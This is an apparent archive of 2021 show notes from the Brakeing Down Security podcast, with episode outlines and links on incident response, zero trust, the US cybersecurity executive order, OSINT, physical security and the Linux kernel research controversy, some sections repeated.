Infosec - vuln mgmt
Compliance
HR - determine hiring requirements
Legal - ensures ethical management of the organization, reduces breaches
How do you implement GRC?
https://www.crowe.com/insights/6-steps-for-a-successful-grc-implementation
Published on: September 29, 2021
8 Steps to Better Security: A Simple Cyber Resilience Guide for Business has finished all final editing and will be published by @WileyTech on October 5th.
Pre-orders are available now via Amazon, Barnes & Noble, and other retailers.
Sponsored Link: https://amzn.to/3k3pDAN
Amazon teaser:
“Harden your business against internal and external cybersecurity threats with a single accessible resource.
In 8 Steps to Better Security: A Simple Cyber Resilience Guide for Business, cybersecurity researcher and writer Kim Crawley delivers a grounded and practical roadmap to cyber resilience in any organization. Offering you the lessons she learned while working for major tech companies like Sophos, AT&T, BlackBerry Cylance, Tripwire, and Venafi, Crawley condenses the essence of business cybersecurity into eight steps.
Written to be accessible to non-technical businesspeople as well as security professionals, and with insights from other security industry leaders, this important book will walk you through how to:
Perfect for CISOs, security leaders, non-technical businesspeople, and managers at any level, 8 Steps to Better Security is also a must-have resource for companies of all sizes, and in all industries.
”
Published on: September 20, 2021
Blumira -
Per crunchbase:
“Blumira's end-to-end platform offers both automated threat detection and response, enabling organizations of any size to more efficiently defend against cybersecurity threats in near real-time. It eases the burden of alert fatigue, complexity of log management and lack of IT visibility. Blumira's cloud SIEM can be deployed in hours with broad integration coverage across cloud, endpoint protection, firewall and identity providers including Office 365, G Suite, Crowdstrike, Okta, Palo Alto, Cisco FTD and many others.”
Contact [email protected]
Patrick Garrity, VP of Operations.
Patrick has years of experience in the security industry building and scaling usable security products. He currently leads Blumira’s product, sales and marketing teams. Prior to joining Blumira, he led sales engineering, product marketing and international expansion for Duo Security.
Twitter = @Thisisnottap
https://www.ibm.com/cloud/blog/top-5-advantages-of-software-as-a-service
https://www.outsource2india.com/software/articles/software-as-a-service.asp
5 Advantages of SaaS
Reduced time to benefit. Software as a service (SaaS) differs from the traditional model because the software (application) is already installed and configured. ...
Lower costs. ...
Scalability and integration. ...
New releases (upgrades) ...
Easy to use and perform proof-of-concepts.
5 Disadvantages of SaaS
Insufficient Data Security.
SaaS-based application model.
Difficulty with Regulations Compliance.
Cumbersome Data Mobility.
Low Performance.
Troublesome Software Integration.
Limit Attack Surface
https://www.wallix.com/blog/top-10-ways-to-limit-attack-surface
https://www.okta.com/identity-101/what-is-an-attack-surface/
https://securityscorecard.com/blog/what-is-cyber-attack-surface-management
8 Steps to Better Security: A Simple Cyber Resilience Guide for Business has finished all final editing and will be published by @WileyTech on October 5th.
It is available now via Kindle.
Pre-orders are available now via Amazon, Barnes & Noble, and other retailers.
Sponsored Link: https://amzn.to/3k3pDAN
Amazon teaser:
“Harden your business against internal and external cybersecurity threats with a single accessible resource.
In 8 Steps to Better Security: A Simple Cyber Resilience Guide for Business, cybersecurity researcher and writer Kim Crawley delivers a grounded and practical roadmap to cyber resilience in any organization. Offering you the lessons she learned while working for major tech companies like Sophos, AT&T, BlackBerry Cylance, Tripwire, and Venafi, Crawley condenses the essence of business cybersecurity into eight steps.
Written to be accessible to non-technical businesspeople as well as security professionals, and with insights from other security industry leaders, this important book will walk you through how to:
Perfect for CISOs, security leaders, non-technical businesspeople, and managers at any level, 8 Steps to Better Security is also a must-have resource for companies of all sizes, and in all industries.
Published on: September 14, 2021
"beautiful country, but hotter than Satan's asshole"
https://www.theverge.com/22648265/apple-employee-privacy-icloud-id
https://mysudo.com/
www.log-md.com
@infosystir
@bryanbrake
@brakesec
@hackershealth
@boettcherpwned
Published on: September 3, 2021
https://blog.teamascend.com/6-phases-of-incident-response
https://www.securitymetrics.com/blog/6-phases-incident-response-plan
Recent vulnerabilities got Bryan thinking about incident response.
Are organizations speedy enough to keep up?
If the spate of vulns continue, what can we do to ensure we are dealing with the most important issues?
How do we communicate those issues to management?
How should we handle the workload?
Testing of your IR costs money, do you have budget for that? (Verodin, red team)
Restoring backups, extra VPC or Azure environment
Incidents occur
You have to minimize issues, right? But is there a good way of doing that?
Simplify your environment?
Spend time working on the CIS 20? You gotta plan for that and show value vs effort.
Incident response is an ever changing landscape.
What is the goal of IR?
Minimize damage
Identify affected systems
Recover gracefully and quickly?
Does your environment allow for quick recovery?
What does ‘return to normal’ look like?
The goal of business
Make money
Incidents should just be considered part of doing business (risks)
The more popular, the more likely the attack
Incident timeframe = criteria for getting back to normal.
PICERL is a cycle, and one of continual improvement. Incident response is not ‘one and done’.
Published on: August 22, 2021
https://blog.teamascend.com/6-phases-of-incident-response
https://www.securitymetrics.com/blog/6-phases-incident-response-plan
Recent vulnerabilities got Bryan thinking about incident response.
Are organizations speedy enough to keep up?
If the spate of vulns continue, what can we do to ensure we are dealing with the most important issues?
How do we communicate those issues to management?
How should we handle the workload?
Testing of your IR costs money, do you have budget for that? (Verodin, red team)
Restoring backups, extra VPC or Azure environment
Incidents occur
You have to minimize issues, right? But is there a good way of doing that?
Simplify your environment?
Spend time working on the CIS 20? You gotta plan for that and show value vs effort.
Incident response is an ever changing landscape.
What is the goal of IR?
Minimize damage
Identify affected systems
Recover gracefully and quickly?
Does your environment allow for quick recovery?
What does ‘return to normal’ look like?
The goal of business
Make money
Incidents should just be considered part of doing business (risks)
The more popular, the more likely the attack
Incident timeframe = criteria for getting back to normal.
PICERL is a cycle, and one of continual improvement. Incident response is not ‘one and done’.
Published on: August 15, 2021
BlackGirlsHack was created to share knowledge and resources to help black girls and women break through barriers to careers in information security and cyber security. The vision for Black Girls Hack (BGH) is to provide resources, training, mentoring, and access to black girls and women and increase representation and diversity in the cyber security field and in the executive suites.
Rebekah Skeete CyberBec @rebekahskeete
Tennisha Martin ~@misstennish
https://www.twitter.com/blackgirlshack - black girls hack
https://www.twitter.com/thefluffy007 - jasmine jackson
Background
https://hitz.com.my/trending/trending-on-hitz/people-that-walk-fast-are-reported-to-be-less-happ
Vegas conference - Blacks in Cyber Village
https://forum.defcon.org/node/236946
https://www.blacksincyberconf.com/bic-village
https://www.youtube.com/c/BlacksInCybersecurity
https://www.blacksincyberconf.com/ctf
https://en.wikipedia.org/wiki/Blind_men_and_an_elephant
https://fuzzcon.forallsecure.com/
https://www.dianainitiative.org/
Social Engineering topics
Misophonia - or phonophobic
https://www.washingtonpost.com/national/health-science/misophonia-is-a-newly-identified-condition-for-people-hypersensitive-to-sound/2014/12/01/7c392782-69ba-11e4-a31c-77759fc1eacc_story.html
https://thecyberwire.com/podcasts/8th-layer-insights
https://terranovasecurity.com/examples-of-social-engineering-attacks/
How all either are directly influenced by.
News, and cool links to read.
SE write-up of a legitimate company (archive.org)
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#AmazonMusic: https://brakesec.com/amazonmusic
#Spotify: https://brakesec.com/spotifyBDS
#Pandora: https://brakesec.com/pandora
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: August 8, 2021
BlackGirlsHack was created to share knowledge and resources to help black girls and women break through barriers to careers in information security and cyber security. The vision for Black Girls Hack (BGH) is to provide resources, training, mentoring, and access to black girls and women and increase representation and diversity in the cyber security field and in the executive suites.
Rebekah Skeete CyberBec @rebekahskeete
Tennisha Martin ~@misstennish
https://www.twitter.com/blackgirlshack - black girls hack
https://www.twitter.com/thefluffy007 - jasmine jackson
Background
https://hitz.com.my/trending/trending-on-hitz/people-that-walk-fast-are-reported-to-be-less-happ
Vegas conference - Blacks in Cyber Village
https://forum.defcon.org/node/236946
https://www.blacksincyberconf.com/bic-village
https://www.youtube.com/c/BlacksInCybersecurity
https://www.blacksincyberconf.com/ctf
https://en.wikipedia.org/wiki/Blind_men_and_an_elephant
https://fuzzcon.forallsecure.com/
https://www.dianainitiative.org/
Published on: August 2, 2021
https://www.mindtools.com/pages/article/newHTE_95.htm
https://www.infoq.com/news/2021/07/microsoft-linux-builder-mariner/
https://www.productplan.com/glossary/action-priority-matrix/
More PrintNightmare issues:
https://www.bleepingcomputer.com/news/microsoft/windows-10-july-security-updates-break-printing-on-some-systems/
“"After installing updates released July 13, 2021 on domain controllers (DCs) in your environment, printers, scanners, and multifunction devices that are not compliant with section 3.2.1 of RFC 4556 spec might fail to print when using smart card (PIV) authentication," Microsoft explained.”
https://www.crowdstrike.com/blog/shlayer-malvertising-campaigns-still-using-flash-update-disguise/
“Shlayer, discovered in 2018, is constantly maintained and also evolving. The graph below is representative of Shlayer continually being a go-to piece of malware that attackers use to compromise the victim’s machine. We observed an uptick in Shlayer detections occurring before the release of CVE-2021-30657 (the Gatekeeper bypass) that was being exploited by Shlayer. This vulnerability was subsequently patched on April 26, 2021.”
https://www.zdnet.com/article/nasty-linux-systemd-security-bug-revealed/
https://access.redhat.com/security/cve/cve-2021-33910
“It works by enabling attackers to misuse the alloca() function in a way that would result in memory corruption. This, in turn, allows a hacker to crash systemd and hence the entire operating system. Practically speaking, this can be done by a local attacker mounting a filesystem on a very long path. This causes too much memory space to be used in the systemd stack, which results in a system crash.”
There's no way to remedy this problem. While it's not present in all current Linux distros, you'll find it in most distros such as the Debian 10 (Buster) and its relatives like Ubuntu and Mint. Therefore, you must, if you value keeping your computers working, patch your version of systemd as soon as possible. You'll be glad you did.
https://redmondmag.com/articles/2021/07/21/serioussam-windows-flaw.aspx
https://securityaffairs.co/wordpress/120576/security/apple-cve-2021-30807-zero-day.html?
https://github.com/GossiTheDog/HiveNightmare
Published on: July 28, 2021
Dan Borges - Author @1njection
Cool near real time updates on the hack: https://www.huntress.com/blog/rapid-response-kaseya-vsa-mass-msp-ransomware-incident
https://twitter.com/DAlperovitch/status/1412033278081708034
https://github.com/ahhh/Cybersecurity-Tradecraft/tree/main/
https://www.amazon.com/Network-Attacks-Exploitation-Matthew-Monte/dp/1118987128
https://en.wikipedia.org/wiki/Best_response
https://labs.bishopfox.com/tech-blog/sliver
https://www.amazon.com/Rootkits-Bootkits-Reversing-Malware-Generation/dp/1593277164
Virtual CCDC:
How easy was the process working with Packt?
Did they approach you or vice versa?
5 D's of Physical Security
The five D's of security seek to do one or more of the following: Deter, Detect, Delay, Deny and Defend.
https://www.securitymagazine.com/articles/82833-the-5-ds-of-outdoor-perimeter-security
Published on: July 19, 2021
Dan Borges - Author @1njection
Cool near real time updates on the hack: https://www.huntress.com/blog/rapid-response-kaseya-vsa-mass-msp-ransomware-incident
https://twitter.com/DAlperovitch/status/1412033278081708034
https://github.com/ahhh/Cybersecurity-Tradecraft/tree/main/
https://www.amazon.com/Network-Attacks-Exploitation-Matthew-Monte/dp/1118987128
https://en.wikipedia.org/wiki/Best_response
https://labs.bishopfox.com/tech-blog/sliver
https://www.amazon.com/Rootkits-Bootkits-Reversing-Malware-Generation/dp/1593277164
Virtual CCDC:
How easy was the process working with Packt?
Did they approach you or vice versa?
5 D's of Physical Security
The five D's of security seek to do one or more of the following: Deter, Detect, Delay, Deny and Defend.
https://www.securitymagazine.com/articles/82833-the-5-ds-of-outdoor-perimeter-security
Published on: July 10, 2021
Pihole setup
Conference talk
https://securityaffairs.co/wordpress/119425/apt/solarwinds-nobelium-ongoing-campaign.html
https://www.ehackingnews.com/2021/06/attackers-pummelled-gaming-industry.html
https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows
https://www.theregister.com/2021/06/15/zoll_defibrillator_dashboard_vulnerabilities/
https://www.ionos.com/digitalguide/server/configuration/winsxs-cleanup/
https://www.customink.com/fundraising/mental-health-hackers-7816
Buy @infoseccampout tickets: https://www.eventbrite.com/e/infosec-campout-2021-tickets-157561790557
Published on: June 30, 2021
Ms. Berlin’s conference report WWFH (Reno, NV)
Her next appearances will be at Defcon 2021 and BlueTeam Con 2021!
https://www.infosecurity-magazine.com/news/amazon-prime-day-phishing-deluge/
https://www.ehackingnews.com/2021/06/threat-actors-use-google-drives-and.html
https://www.kennasecurity.com/blog/vulnerability-score-on-its-own-is-useless/
https://github.blog/2021-04-29-call-for-feedback-policies-exploits-malware/
https://github.com/github/site-policy/pull/397
https://twitter.com/vm_call/status/1405937492642123782?s=20
https://thenewstack.io/cvss-struggles-to-remain-viable-in-the-era-of-cloud-native-computing/
Published on: June 22, 2021
EO from President Biden asked for a plan to create a Zero Trust implementation within 90 days (well, 70-ish days now… as of 23 May)
https://twitter.com/SecuritySphynx/status/1390475868032618496
@securitySphynx
“CIO: Zero Trust is the way…”
What is the optimal configuration (read: easiest) zero trust config?
Are there different ways to implement Zero Trust?
https://solutions.pyramidci.com/blog/posts/2021/february/the-swiss-cheese-approach/
https://tulsaworld.com/opinion/columnists/zero-trust-security-assume-that-everyone-and-everything-on-the-internet-is-out-to-get/article_f6bdbfad-1aae-5063-8ac0-6a1faf5a244c.html
https://www.reddit.com/r/devops/comments/bqo6kp/open_source_or_cheap_zero_trust_beyondcorp/
https://opensource.com/article/17/6/4-easy-ways-work-toward-zero-trust-security-model
https://dodcio.defense.gov/Portals/0/Documents/Library/(U)ZT_RA_v1.1(U)_Mar21.pdf
What is ZTA?
Who are your users?
What Devices in use?
Device attestation/health checks
Applications exist?
Connections exist?
Not just into/out of the traditional LAN network - do you understand dependencies of applications and databases and how the traffic flows?
Where is the data/traffic? coming from? Going to?
When is this activity occurring and what is expected?
WHY: Need to balance the access to technical resources in a rapidly evolving and dynamic business landscape that ceases to exist within the confines of normal security perimeters.
Mobile workforce - how much work can you get done without ever getting on the VPN?
Blockers
Technical Debt
IT Hygiene
Zero Trust REQUIRES the pre-work of establishing baselines. You cannot detect abnormality in the absence of normality.
Policy should exist to drive what the specifications of a baseline system, server, application, etc will be.
Network traffic, endpoint performance, SIEM tuning, endpoint agent/software accountability
ZTA is less useful if you're not doing basic patching and application updates, or if you're allowing local admin at the system level.
Legacy Systems:
Not designed with this approach in mind, and often costly to modernize.
Asset Management
Where are your assets and how are they used? A “rough estimate” of endpoints is never good enough.
What are you logging? What AREN’T you logging?
User rights auditing
Stale accounts, service accounts, HR Workflows for onboarding/offboarding
Limitations of admin rights
Local admin/password expiration issues for sales/travelling employees
Human resources/talent
Politics: Getting support/$$$/Buy-in for retrofitting applications that are “working just fine” is a huge political/business hurdle.
Where to go from here:
SaaS/PaaS/etc offerings
What can you move from traditional on-prem solutions to cloud-based services? (More up to date, regularly reviewed for security vulnerabilities, offloads maintenance responsibility, SSO capabilities.)
AAA requirements
MFA is a MUST. No, it's not perfect, but it is one more layer in efficacy.
Have discussions around REAL RBAC needs BEFORE implementing a solution. It is easier to expand permissions than it is to take them away. Resist the idea that the easy button of broad stroke permissions is always the right choice.
Identify data owners, make them responsible for RBAC development with technical departments.
Quantify risk associated with mishandled resources for crown jewels (see previous section on politics).
Change control around permissions, access
Security as an active participant in the development/acquisition of new products, software, services, or organizations. Like remodeling a house, it is much easier to build security into the process than to hire someone to retrofit it later.
What auditing are you doing? Have you baselined behavior? Where are your logs going, and WHO IS RESPONSIBLE FOR REVIEWING THEM?
Manage the Endpoint: Stop thinking about the perimeter as your weakest point. The endpoint is critical and increasingly vulnerable, mobile, out of traditional “control”. Real time, actionable data and capabilities are critical to remediation and progress.
Asset Inventory (again)... Then…
HIDS/Firewall
Patch
Applocker/Application Controls
Lather, rinse, repeat.
DLP Classification
It’s hard, it’s time-consuming, and it requires a LOT of support for business unit owners.
Capture metrics, then set KPIs and regular check ins to reduce MTTP/MTTR/MTTD
Would you like to know more?
https://www.beyondtrust.com/blog/entry/why-zero-trust-is-an-unrealistic-security-model
Full show notes are available here: https://docs.google.com/document/d/14dCpXeQ520IcZC3m007zVPhlIPXKgfv0LkqVnbDx0fc/edit?usp=sharing
Published on: June 6, 2021
Part 2:
CTF OSINT discussion
How people will give additional information, even if they aren't receiving points for it.
Gamifying and motivating people to 'do the right thing', like offering a chance to win a lottery for a covid vaccine, or free sports tickets to get a shot, or gift cards when reporting phishes.
Joe Gray @C_3PJoe
OSINTION
New book… ship date? How to get it?
https://www.amazon.com/Practical-Social-Engineering-Joe-Gray/dp/171850098X/
https://nostarch.com/practical-social-engineering
"Gray provides a very accessible look at social engineering that should be essential reading for pentesters and ethical hackers."
— Ian Barker, BetaNews
Story (Bryan: found my shipmate from the Navy)
Gathering OSINT (what is ethically too far?)
OSINT heartbeat
https://matrix.berkeley.edu/research-article/berkeley-protocol-open-source-investigations/
The OSINTion Discord: https://discord.gg/p78TTGa
Stick/carrot interactions: https://www.aamc.org/news-insights/dollars-doughnuts-will-incentives-motivate-covid-19-vaccination
How do we motivate or create the desire?
Ohio Covid lottery - https://www.dispatch.com/story/news/2021/05/13/ohio-covid-vaccine-lottery-heres-how-you-can-win/5071370001/
Art sessions with Ms. Berlin
Published on: May 28, 2021
Elizabeth Wharton: @lawyerliz on Twitter
Executive Order: (https://www.americanbar.org/groups/public_education/publications/teaching-legal-docs/what-is-an-executive-order-/)
“An executive order is a signed, written, and published directive from the President of the United States that manages operations of the federal government. They are numbered consecutively, so executive orders may be referenced by their assigned number, or their topic. Other presidential documents are sometimes similar to executive orders in their format, formality, and issue, but have different purposes. Proclamations, which are also signed and numbered consecutively, communicate information on holidays, commemorations, federal observances, and trade. Administrative orders—e.g. memos, notices, letters, messages—are not numbered, but are still signed, and are used to manage administrative matters of the federal government. All three types of presidential documents—executive orders, proclamations, and certain administrative orders—are published in the Federal Register, the daily journal of the federal government that is published to inform the public about federal regulations and actions. They are also catalogued by the National Archives as official documents produced by the federal government. Both executive orders and proclamations have the force of law, much like regulations issued by federal agencies, so they are codified under Title 3 of the Code of Federal Regulations, which is the formal collection of all of the rules and regulations issued by the executive branch and other federal agencies.
Executive orders are not legislation; they require no approval from Congress, and Congress cannot simply overturn them. Congress may pass legislation that might make it difficult, or even impossible, to carry out the order, such as removing funding. Only a sitting U.S. President may overturn an existing executive order by issuing another executive order to that effect.”
https://www.whitehouse.gov/briefing-room/presidential-actions/2021/05/12/executive-order-on-improving-the-nations-cybersecurity/
Another Review: https://www.atlanticcouncil.org/blogs/new-atlanticist/markup-our-experts-annotate-bidens-new-executive-order-on-cybersecurity/
https://www.insurancejournal.com/news/national/2021/05/21/615373.htm
Within 60 days of the date of this order, the head of each agency shall:
(i) update existing agency plans to prioritize resources for the adoption and use of cloud technology as outlined in relevant OMB guidance;
(ii) develop a plan to implement Zero Trust Architecture, which shall incorporate, as appropriate, the migration steps that the National Institute of Standards and Technology (NIST) within the Department of Commerce has outlined in standards and guidance, describe any such steps that have already been completed, identify activities that will have the most immediate security impact, and include a schedule to implement them; and
Within 180 days of the date of this order, agencies shall adopt multi-factor authentication and encryption for data at rest and in transit, to the maximum extent consistent with Federal records laws and other applicable laws.
Within 90 days of the date of this order, the Secretary of Homeland Security acting through the Director of CISA, in consultation with the Attorney General, the Director of the FBI, and the Administrator of General Services acting through the Director of FedRAMP, shall establish a framework to collaborate on cybersecurity and incident response activities related to FCEB cloud technology, in order to ensure effective information sharing among agencies and between agencies and CSPs.
SBOM! Dr. Allan Friedman on BrakeSec
http://brakeingsecurity.com/2020-032-dr-allan-friedman-sbom-software-transparency-and-how-the-sausage-is-made-part-2
providing a purchaser a Software Bill of Materials (SBOM) for each product directly or by publishing it on a public website;
(viii) participating in a vulnerability disclosure program that includes a reporting and disclosure process;
(ix) attesting to conformity with secure software development practices
Within 270 days of the date of this order, the Secretary of Commerce acting through the Director of NIST, in coordination with the Chair of the Federal Trade Commission (FTC) and representatives of other agencies as the Director of NIST deems appropriate, shall identify IoT cybersecurity criteria for a consumer labeling program, and shall consider whether such a consumer labeling program may be operated in conjunction with or modeled after any similar existing government programs consistent with applicable law. The criteria shall reflect increasingly comprehensive levels of testing and assessment that a product may have undergone, and shall use or be compatible with existing labeling schemes that manufacturers use to inform consumers about the security of their products. The Director of NIST shall examine all relevant information, labeling, and incentive programs and employ best practices. This review shall focus on ease of use for consumers and a determination of what measures can be taken to maximize manufacturer participation.
Rebuttal to “The Hill article”: https://soatok.blog/2021/05/19/a-balanced-response-to-allen-gwinn/ thank you Brian Harden (@_noid)
Author’s ‘apology’: https://twitter.com/2wiredSecurity/status/1395531110436704258
Published on: May 22, 2021
Joe Gray @C_3PJoe
OSINTION
New book… ship date? How to get it?
https://www.amazon.com/Practical-Social-Engineering-Joe-Gray/dp/171850098X/
https://nostarch.com/practical-social-engineering
"Gray provides a very accessible look at social engineering that should be essential reading for pentesters and ethical hackers."
— Ian Barker, BetaNews
Story (Bryan: found my shipmate from the Navy)
Gathering OSINT (what is ethically too far?)
OSINT heartbeat
https://matrix.berkeley.edu/research-article/berkeley-protocol-open-source-investigations/
The OSINTion Discord: https://discord.gg/p78TTGa
Published on: May 18, 2021
Updates to the Linux kernel controversy: https://lwn.net/SubscriberLink/854645/334317047842b6c3/
@pageinSec on Twitter
Dan Kaminsky obit: https://www.theregister.com/2021/04/25/dan_kaminsky_obituary/
Spencer Geitzen: http://brakeingsecurity.com/2018-024-pacu-a-tool-for-pentesting-aws-environments
https://en.wikipedia.org/wiki/Milgram_experiment
https://lore.kernel.org/lkml/[email protected]/
https://cse.umn.edu/cs/statement-cse-linux-kernel-research-april-21-2021
https://www.labbott.name/blog/2021/04/21/breakingtrust.html
Seems like a number of patches were added (~190) and each had to be reviewed to check for badness
https://twitter.com/UMNComputerSci/status/1384948683821694976 response to researchers
Linux Kernel mailing list: https://lore.kernel.org/linux-nfs/YH%2FfM%[email protected]/
https://twitter.com/SarahJamieLewis/status/1384871385537908736
@sarahJamieLewis shows the change they submitted in their paper: https://twitter.com/SarahJamieLewis/status/1384876050207940608
https://twitter.com/SarahJamieLewis/status/1330671897822982144/photo/1
https://twitter.com/SarahJamieLewis/status/1384880034146574341/photo/1
https://web.archive.org/web/20210421145121/https://www-users.cs.umn.edu/~kjlu/papers/crix.pdf (appears the researcher deleted this paper from their site.)
https://web.archive.org/web/20210422144500/https://www-users.cs.umn.edu/~kjlu/papers/clarifications-hc.pdf (researcher deleted this paper from their site.)
“Throughout the study, we honestly did not think this is human research, so we did not apply for an IRB approval in the beginning. We apologize for the raised concerns. This is an important lesson we learned---Do not trust ourselves on determining human research; always refer to IRB whenever a study might be involving any human subjects in any form. We would like to thank the people who suggested us to talk to IRB after seeing the paper abstract.”
https://github.com/QiushiWu/qiushiwu.github.io
NSF Grant application (thank you Page!) https://www.nsf.gov/awardsearch/showAward?AWD_ID=1931208&HistoricalAwards=false
NSF IRB requirements (from 2007): https://www.nsf.gov/pubs/2007/nsf07006/nsf07006.jsp
Might be more recent - Human Subjects | NSF - National Science Foundation
The researchers issued an apology today, 25 April: https://lore.kernel.org/lkml/CAK8KejpUVLxmqp026JY7x5GzHU2YJLPU8SzTZUNXU2OXC70ZQQ@mail.gmail.com/ *thanks to Zack Whittaker’s security mailing list.*
Thought provoking question for your show: is it realistically possible for an organization to build and scale a culture of code review that catches malicious insertions through (1) expert analysis; (2) adversarial mindset?
Co-author of: https://www.amazon.com/Building-Secure-Reliable-Systems-Implementing/dp/1492083127
Introduction of bugs (meaningful or otherwise) caused more work for devs.
Revert: https://lkml.org/lkml/2021/4/21/454
Quick overview of using deception in research from Duke’s IRB: Using Deception in Research | Institutional Review Board (duke.edu)
Is this better? Where’s the line on this?
Published on: May 5, 2021
https://danielmiessler.com/blog/explaining-threats-threat-actors-vulnerabilities-and-risk-using-a-real-world-scenario/
Revert list of 190 patches (threaded): https://lkml.org/lkml/2021/4/21/454
Published on: April 27, 2021
https://www.reddit.com/r/netsec/comments/jlu3cf/nat_slipstreaming/
Samy Kamkar - NAT Slipstreaming v2.0
Pwn2Own 2021: Hackers Offered $200,000 for Zoom, Microsoft Teams Exploits | SecurityWeek.Com
https://twitter.com/k8em0/status/1381258155485585409
https://twitter.com/alisaesage/status/1380797761801445376?s=20
infosecCampout 2021
Hackers Who Paint
WWHF Way west
https://pastebin.com/2eYY6trD (for training students)
@lintile
@infosecroleplay
Published on: April 13, 2021
Reparations.tech
*Public Safety Coordinators
-Field Operations (Road Incidents)
-Specialized Buildings (The Library, Medical Facilities, CCR)
*Public Safety Officers
A. Discuss Training
-SOP Creation
*SOPs are very custom and dependent on the organization. There are no “NIST” standards.
[IN CYBER: Frameworks for Physical Security ---> ]
*Think on your feet, many plans often get thrown out the window.
*Creating policies due to unforeseen incidents
-Physical Security Assessments: Fire Panels, AED, Roof Accesses
*The Checklist: Baseline configuration of the operations for a building
*Locksmith Troubleshooting
*Lack of Funding (Historically) + Ways to Address this In-House
-There’s a lack of good training to discuss their own physical security
*Ph.Ds leaving car doors wide open, blaming safety officers when they mess up
*Common sense is not so common
*Scenarios don’t always cover every event
*Dead bodies, car accidents, people streaking (lol), medical issues
-Policies can be simple, like opening a car door
*Need to vet whether the car is actually the person's
Have you seen both good and bad training on situational awareness? Does it seem to differ between physical and cyber security?
Summary of the Clery Act | Clery Center
“The Clery Act is a consumer protection law that aims to provide transparency around campus crime policy and statistics.
In order to comply with Clery Act requirements, colleges and universities must understand what the law entails, where their responsibilities lie, and what they can do to actively foster campus safety.”
C. Real Life examples of Physical Security Blunders
*Escalation Management
*Police often increase tensions when de-escalation is needed.
*Working as a team
*Locksmith Team + Public Safety Team
*Looking for talent in unexpected places to transfer over to CyberSecurity (Build the Bridge)
Lockpicking Community: [insert folks on twitter / youtube]
5 Ways IT Managers Can Work with Their Physical Security Counterpart (stanleysecuritysolutions.com)
12 Security Camera System Best Practices – Cyber Safe (een.com)
What is Physical Security? Measures & Planning Guide + PDF (openpath.com)
Published on: April 7, 2021
Bios for guests
Published on: March 30, 2021
In this episode:
knowing your audience - discussing the IR impact
how did this happen? how deep do you want to tailor your potential discussion?
Every level must be asking "what, when, why, how?", not just those in the trenches
does the level of incident mean that communication scales accordingly?
And much more!
Dr. Catherine J. Ullman (@investigatorchi)
Incident Response communications
Reminders:
Patreon Jeff T. just became a $2 patron!
Accepted to CircleCityCon on IR communications!
Bsides Rochester Security B-Sides Rochester
Spoke at SeaSec meetups:
Qualys Update on Accellion FTA Security Incident | Qualys Security Blog
Security Advisory | SolarWinds
Family Educational Rights and Privacy Act (FERPA)
It’s important to share necessary information with senior-level people and higher-ups, but is there such a thing as ‘oversharing’?
How do you walk the line between oversharing and saying nothing at all?
In higher Ed, are you beholden to different disclosure requirements than businesses?
What is Server Side Request Forgery (SSRF)? | Acunetix
13 Beautiful Tools to Create Status Pages for your Business (geekflare.com)
Laying communication groundwork
Status pages (notifying users)
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#AmazonMusic: https://brakesec.com/amazonmusic
#Spotify: https://brakesec.com/spotifyBDS
#Pandora: https://brakesec.com/pandora
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: March 21, 2021
Dr. Catherine J. Ullman (@investigatorchi)
Incident Response communications
Published on: March 17, 2021
@thefluffy007
A Bay Area Native (Berkeley)
I always tell people my computer journey started at 14, but it really started at 5th grade (have a good story to tell about this)
Was a bad student in my ninth grade year - almost kicked out of high school due to cutting. Had a 1.7 GPA. After my summer internship turned it around to a 4.0.
Once I graduated from high school, I knew I wanted to continue on the path of computers. Majored in Computer Science
Graduated with Bachelors and Masters in Computer Science. Graduate Certificate in Information Security and Privacy. Minor in Math.
Interested in security from a Yahoo! Group on Cryptography. Liked how you can turn text into gibberish and back again.
Became interested in penetration testing after moving to Charlotte, and moonlighted as a QA while a full-stack developer.
Co-workers did not want me to test their code because I would always find bugs.
Moved into penetration testing space.
Always had an interest in mobile, but never did mobile development and decided it wasn’t for me
Became interested in bug bounties and noticed that mobile payouts were higher.
At this time also completed SANS 575 - Mobile Device Security and Ethical Hacking.
Realized the barrier to entry was VERY (almost non-existent) low in Android as it’s open source.
Started to learn/expand mobile hacking on my own time
The threat exposure is VERY high with mobile hacking. As you have a web app component, network component, and phone component. I always reference a slide from Secure Works.
Link to YouTube Channel → thefluffy007 - YouTube
thefluffy007 – A security researchers thoughts on all things security – web, mobile, and cloud
The Mobile App Security Company | NowSecure
owasp-mstg/Crackmes at master · OWASP/owasp-mstg · GitHub
Rana Android Malware (reversinglabs.com)
These 21 Android Apps Contain Malware | PCMag
Android Tamer -Android Tamer
The Diary of an (Inexperienced) Bug Hunter - Intro to Android Hacking | Bugcrowd
Android Debug Bridge (adb) | Android Developers
Goal: discussing best practices and methods to reverse engineer Android applications
Introduction to Java (w3schools.com)
JavaScript Introduction (w3schools.com)
Introduction to Python (w3schools.com)
